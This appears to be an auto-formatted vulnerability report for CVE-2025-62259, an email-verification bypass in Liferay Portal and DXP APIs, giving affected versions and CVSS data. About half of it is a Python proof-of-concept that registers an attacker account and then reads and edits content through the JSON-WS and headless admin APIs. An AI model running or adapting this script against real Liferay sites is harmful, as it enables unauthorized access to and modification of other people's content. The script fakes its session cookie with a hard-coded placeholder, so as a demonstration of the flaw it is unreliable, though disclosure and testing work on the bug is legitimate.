Security Vulnerability Report
CVE-2025-62259 CVSS 5.4 MEDIUM

CVE-2025-62259

Published: 2025-10-27 23:15:39
Last Modified: 2025-12-08 14:36:33

Description

Liferay Portal 7.4.0 through 7.4.3.109, and older unsupported versions, and Liferay DXP 2023.Q3.1 through 2023.Q3.4, 7.4 GA through update 92, 7.3 GA through update 35, and older unsupported versions does not limit access to APIs before a user has verified their email address, which allows remote users to access and edit content via the API.

CVSS Details

CVSS Score
5.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:liferay:digital_experience_platform:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:liferay:digital_experience_platform:7.1:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:liferay:digital_experience_platform:7.2:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:liferay:digital_experience_platform:7.3:-:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:liferay:digital_experience_platform:7.3:fix_pack_1:*:*:*:*:*:* - VULNERABLE
Liferay Portal 7.4.0 - 7.4.3.109
Liferay Portal < 7.4.0 (older unsupported versions)
Liferay DXP 2023.Q3.1 - 2023.Q3.4
Liferay DXP 7.4 GA - update 92
Liferay DXP 7.3 GA - update 35
Liferay DXP < 7.3 (older unsupported versions)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests

# CVE-2025-62259 PoC - Liferay Portal Email Verification Bypass
# Target: Liferay Portal/DXP with vulnerable API endpoints

TARGET_URL = "http://target-liferay.com"


def create_user():
    """Step 1: Create a new user account without email verification"""
    endpoint = f"{TARGET_URL}/api/jsonws/user/add-user"
    params = {
        "companyId": "1",
        "autoPassword": "true",
        "passwordReset": "false",
        "reminderQueryQuestion": "what-is-your-password",
        "reminderQueryAnswer": "test",
        "graceLoginCount": "0",
        "screenName": "attacker_user",
        "emailAddress": "[email protected]",
        "facebookId": "0",
        "languageId": "en_US",
        "firstName": "Attacker",
        "lastName": "Test",
        "prefixId": "0",
        "suffixId": "0",
        "male": "true",
        "birthdayMonth": "1",
        "birthdayDay": "1",
        "birthdayYear": "2000",
        "jobTitle": "",
        "groupIds": "",
        "organizationIds": "",
        "roleIds": "",
        "userGroupIds": "",
        "sendEmail": "false",
    }
    response = requests.post(endpoint, data=params)
    return response.json()


def access_api_without_verification(auth_cookie):
    """Step 2: Access and edit content via API without email verification"""
    headers = {"Cookie": auth_cookie}

    # Access user info via API
    users_endpoint = f"{TARGET_URL}/api/jsonws/user/get-user-by-email-address"
    users_params = {"companyId": "1", "emailAddress": "[email protected]"}
    users_response = requests.get(users_endpoint, headers=headers, params=users_params)
    print(f"User Info Retrieved: {users_response.status_code}")

    # Access layouts via API
    layouts_endpoint = f"{TARGET_URL}/api/jsonws/layout/get-layouts"
    layouts_params = {"groupId": "0", "private": "false"}
    layouts_response = requests.get(layouts_endpoint, headers=headers, params=layouts_params)
    print(f"Layouts Accessed: {layouts_response.status_code}")

    # Edit content via headless API
    edit_endpoint = f"{TARGET_URL}/o/headless-admin-user-api/v1.0/user-accounts"
    edit_response = requests.patch(edit_endpoint, headers=headers, json={"description": "modified"})
    print(f"Content Edit Attempt: {edit_response.status_code}")

    return layouts_response.json()


def main():
    print("CVE-2025-62259 PoC - Liferay Portal API Access Before Email Verification")
    user_result = create_user()
    print(f"User Created: {user_result}")

    # Simulate obtaining auth cookie without email verification
    auth_cookie = "LFR_SESSION_TOKEN=attacker_session; COMPANY_ID=1; USER_ID=12345"
    access_api_without_verification(auth_cookie)
    print("PoC completed - API accessed without email verification")


if __name__ == "__main__":
    main()
```

References

Raw JSON Data
